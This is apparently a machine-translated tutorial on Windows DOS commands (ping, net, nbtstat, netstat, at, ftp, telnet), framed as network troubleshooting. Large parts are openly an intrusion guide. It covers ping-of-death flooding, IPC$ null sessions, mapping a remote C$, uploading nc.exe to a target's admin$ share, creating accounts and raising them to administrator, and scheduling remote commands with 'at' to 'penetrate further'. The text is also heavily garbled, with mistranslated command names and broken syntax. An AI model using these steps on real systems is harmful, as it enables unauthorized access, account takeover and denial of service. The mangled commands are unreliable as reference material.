Common DOS commands for detecting network problems

I believe everyone is familiar with the ping command under windows, but not many people can maximize the ping function. Of course, I'm not saying that the ping function can be maximized. I just often use the ping tool, and I have also summed up some small experiences. Now I will share them with you.

Now I will refer to the help description of the ping command to tell you the skills I will use when using ping. Ping can only be used after the tcp/ip protocol is installed:

Ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer list] | [-k computer list ]] [-wz timeout] destination list.

Options:

-t ping the specified host until it stops to view statistics and continue-type control-break；; Stop-type control-c.

Keep ping the local host until you press control-c.

This function has no special skills, but it can be used with other parameters, which will be mentioned below.

Net use \\ip\ipc$ ""/user: ""Establish ipc null link.

Net uses \\ip\ipc$ "password" /user: "username" to establish ipc non-empty link.

Net uses H:\ \ IP \ C $ "password "/ user:" username "to log in directly and map it to the other party's C: local, that is, H:

Net uses h: \\ip\c$ to log in and map each other. C: to the local area, that is, h:

Net use \\ip\ipc$ /del Delete ipc link.

Net uses h: /del to delete the mapping from the other side to the local area, and the name is h:

Net user name password/add create user.

Network User Guest/Activity: Yes, the guest user is activated.

Net users to see which users are there.

Net user account name to view the properties of the account.

Net local group * * * administrator s user name /add to add "user" to the administrator, so that it has administrator rights. Note: **istrator is followed by the plural form of S.

Net starts to see which services are turned on; Net start service name opens the service; (such as: net start telnet,

Net start schedule)net stop service name stops service.

Net time \\ The target ip checks the other party's time.

Net time \\ Target ip /set sets the time of the local computer to be synchronized with the time of the "target ip" host, and adds the parameter /yes to cancel the confirmation information.

Check which * * * privileges are enabled in the local LAN.

Net view \\ip to see which * * * permissions are enabled in the other party's LAN.

Network Configuration Displays the system network settings.

Network offline disconnect * * * Enjoy

Net pause service name pause service.

Net send ip "SMS" sends a message to the other party.

The network connection type and information are used for the network.

Share online to see the local enjoyment.

Net share ipc$ Open ipc$*** Enjoy.

Net share ipc$ /del Delete ipc$***

Net share c$ /del Delete c:* * * * Enjoy.

Net user guest 12345 logs in, and changes the system login password to 12345net password password.

Netstat -a to see which ports are open and commonly used.

Netstat -annetstat -n View the network connection of the port, commonly used.

View the work in progress.

Example of netstat -p protocol name: netstat -p tcp/ip view the usage of the protocol (view the usage of tcp/ip protocol).

Netstat -s checks the usage of all the protocols in use.

One of the ip ports of Nbtstat -a ip from 136 to 139 is open. You can view the user name that the other party recently logged in (user name before 03)-Note: the parameter -a should be capitalized.

Tracert- parameter ip (or computer name) tracks the route (packet), and parameter: "-w number" is used to set the timeout interval.

Ping ip (or domain name) sends data with a default size of 32 bytes to another host. The parameter is "-l[ space] packet size"; "-n times to send data"; "-t" means ping all the time.

Ping -t -l 65550 ip Ping of death (sending files larger than 64k and ping all the time becomes ping of death).

Ipconfig (winipcfg) is used for windows nt and xp(windows 95 98) to view local ip addresses.

Ipconfig can display all configuration information with the parameter "/all".

Tlist -t displays processes in a tree-row list (it is an additional tool of the system, which is not installed by default and is located in the support/tools folder of the installation directory).

Add the -f parameter to the kill -f process name to force a process to end (it is an additional tool of the system and is not installed by default, under the support/tools folder of the installation directory).

Del -f file name can be deleted after adding the-f parameter. /ar, /ah, /as and /aa respectively mean deleting read-only, hidden, system and archive files. /a-r, /a-h, /a-s and /a-a mean to delete files other than read-only, hidden, system and archive files. For example, "del/ar *. * "means to delete all read-only files in the current directory," del/a-s *. * "means to delete all files except system files in the current directory.

switch an electrical device off

The command is as follows:

Shutdown.exe-A canceled the shutdown.

Turn it off.

Shutdown.exe-F forces the application to close.

The computer name Shutdown.exe-m \ \ controls the remote computer.

Exe-I displays a graphical user interface, but it must be the first parameter of Shutdown.

Shutdown.exe-l logs off the current user.

Shut down and restart.

Time sets the countdown to shutdown.

Shutdown.exe-c "Message Content" Enter the message content in the shutdown dialog box (it cannot exceed 127 characters).

Two: Ping

It is a command to check whether the network is unblocked or the speed of network connection. As an administrator or hacker living on the network, the ping command is the first DOS command that must be mastered. The principle it uses is this: all machines on the network have unique IP addresses. When we send a packet to the target IP address, the other party will return a packet of the same size. According to the returned data packet, we can determine the existence of the target host and preliminarily judge the operating system of the target host. Let's take a look at some common operations. Look at the help first, and enter: ping/? Get back in the car. Help screen displayed in. Here, we only need to master some basic and useful parameters (the same below).

-t means that the packet will continue to be sent to the destination IP until we force it to stop. Imagine, if you use 100M broadband access and the target IP is a 56K kitten, it won't be long before the target IP will be disconnected because it can't carry so much data. Hehe, an attack is as simple as that.

-l defines the size of the sent packet, which is 32 bytes by default, and we can use it to define the maximum size as 65500 bytes. Combined with the -t parameter introduced above, the effect will be better.

-n defines the number of times packets are sent to the target IP, and the default is 3 times. If the network speed is slow, three times will waste us a lot of time, because now our purpose is only to judge whether the target IP exists, so we define it as once.

It should be noted that if the -t parameter and the -n parameter are used together, the ping command is based on the following parameters, such as "ping IP -t -n 3". Although the -t parameter is used, it is not always pinged, but only pinged three times. In addition, the ping command does not have to ping IP, but can also directly ping the host domain name, so that the IP of the host can be obtained.

nbtstat

This command displays protocol statistics using TCP/IP and NETBIOS on the current TCP/IP connection. With this command, you can get NetBIOS information of the remote host, such as user name, workgroup, MAC address of network card, etc. It is necessary for us to know some basic parameters here.

-a With this parameter, you can get the NETBIOS information of the remote host as long as you know its machine name (the same below).

The -A parameter can also get NETBIOS information of the remote host, but you need to know its IP.

-n Lists the NETBIOS information of the local computer.

When we get each other's IP or machine name, we can use nbtstat command to further get each other's information, which increases the insurance factor of our invasion.

netstat

This is a simple and powerful command to check the network status.

-a Check all the open ports of the local machine, which can effectively find and prevent Trojans and learn about the open services of the machine.

As you can see, there are FTP services, Telnet services, mail services, WEB services and so on in the local machine. Usage: netstat -a IP.

-r lists the current routing information and tells us the gateway and subnet mask of the local machine. Usage: netstat -r IP.

tracert

Tracking routing information, using this command, we can find all the paths through which data is transmitted from the local machine to the target host, which is very helpful for us to understand the network layout and structure.

That is to say, the data is transmitted from the local machine to the machine of192.168.0.1without any intermediate transmission, which means that the two machines are on the same LAN. Usage: tracert IP

net

This command is the most important one in the network command, and we must thoroughly master the usage of each subcommand, because its function is very powerful. Here we focus on several commonly used subcommands.

Network view

Use this command to view all * * * resources of the remote host. The format of this command is net view \\IP.

Net use

A shared resource of a remote host is implied as a local symbol, and the graphical interface is convenient to use, hehe. The format of this command is net use x: \\IP\sharename. The above one refers to the mapping of * * with IP of 192. 168.0.5 to the local Z disk. The following means to establish IPC$ connection with192.168.0.7 (net use $ ">; \\IP\IPC$ "password" /user:"name ")，

After establishing IPC$ connection, hehe, you can upload files: copy nc.exe $ "> \ \192.168.0.7 \ admin $,that is, transfer the nc.exe in the local directory to the remote host, and combine with other DOS commands to be introduced later to realize the invasion.

Net start

Use it to start a service on a remote host. When you establish a connection with a remote host, what should you do if you find that any of its services are not started and you want to use that service? Just use this command to start it. Usage: net start servername, successfully started the telnet service.

Network stop

What should I do if I find that a service of the remote host is in the way after the invasion? Stop with this command, and it's ok. Usage is the same as net start.

netuser

View information related to accounts, including creating new accounts, deleting accounts, viewing specific accounts, activating accounts, disabling accounts, etc. This is very beneficial to our invasion, and most importantly, it provides a premise for us to clone accounts. Type net user without parameters to view all users, including those who have been disabled. The following are explained separately.

1, net user abcd 1234 /add, create a new account, user name abcd, password 1234, and be a user group member by default.

2. net user abcd /del, delete the user whose user name is abcd.

3. net user abcd /active: No, users with the user name abcd are disabled.

4. net user abcd /active: Yes, activate the user whose user name is abcd.

5. net user abcd, and check the user name of abcd.

Net localgroup View all information related to user groups and perform related operations. Type net localgroup without parameters to list all current user groups. In the process of invasion, we usually use it to upgrade an account to an administrator group account, so that we can use this account to control the entire remote host.

Pure working hours

This command can check the current time of the remote host. If your goal is only to enter a remote host, then you may not need this command. But the simple invasion succeeded. Is it just a look? We need to penetrate further. This even needs to know the current time of the remote host, because using time and other means (mentioned later) can realize the regular start of a command and program, laying a good foundation for our further invasion. Usage: net time \\IP.

exist

The function of this command is to arrange the execution of specific commands and programs on a specific date or time (see the importance of net time? )。 When we know the current time of the remote host, we can use this command to make it execute a program and command at a later time (such as 2 minutes later). Usage: at time command \ \ computer.

It means that at 6: 55, let the computer named a-0 1 start the telnet service (where net start telnet is the command to start the telnet service).

File Transfer Protocol (abbreviation for file transfer protocol)

First, enter ftp Enter at the command line, and an ftp prompt will appear. At this point, you can enter "help" to view the help (any DOS command can use this method to view its help).

The first is the login process, which will use open. Just enter "Open host IP ftp port" at the FTP prompt and press Enter. Generally, the default port is 2 1, so don't write it. Then enter a legal user name and password to log in. Take anonymous ftp as an example here.

The user name and password are ftp, and the password is not displayed. When prompted * * * to log in, it means that the login is successful. Because this is an anonymous login, the user appears anonymous. Next, we will introduce the usage of specific commands.

Dir, like DOS command, is used to view the files of the server. Just press the dir enter key to see the files on this ftp server.

Cd into the folder.

Get downloads the file to the local machine.

Upload files to a remote server. It depends on whether the remote ftp server grants you write permission. If there is, hehe, I won't say much about how to use it. Let's play freely.

Delete Delete the files on the remote ftp server. This must also ensure that you have write permission.

Bye exits the current connection.

Resign. Same as above.

remote login

Powerful remote login command, almost all intruders like to use, and it works well. Why? The operation is simple, just like using your own machine. As long as you are familiar with DOS commands and successfully connect to a remote machine as an administrator, you can use it to do anything you want. The following is how to use it. First, type telnet Enter, and then type help to view its help information.

Then type open IP enter at the prompt, and the login window will appear, allowing you to enter a legal user name and password. Any password entered here will not be displayed.

When the username and password are correct, the telnet connection is successfully established. At this point, you have the same permissions as this user on the remote host, and you can use DOS commands to do what you want.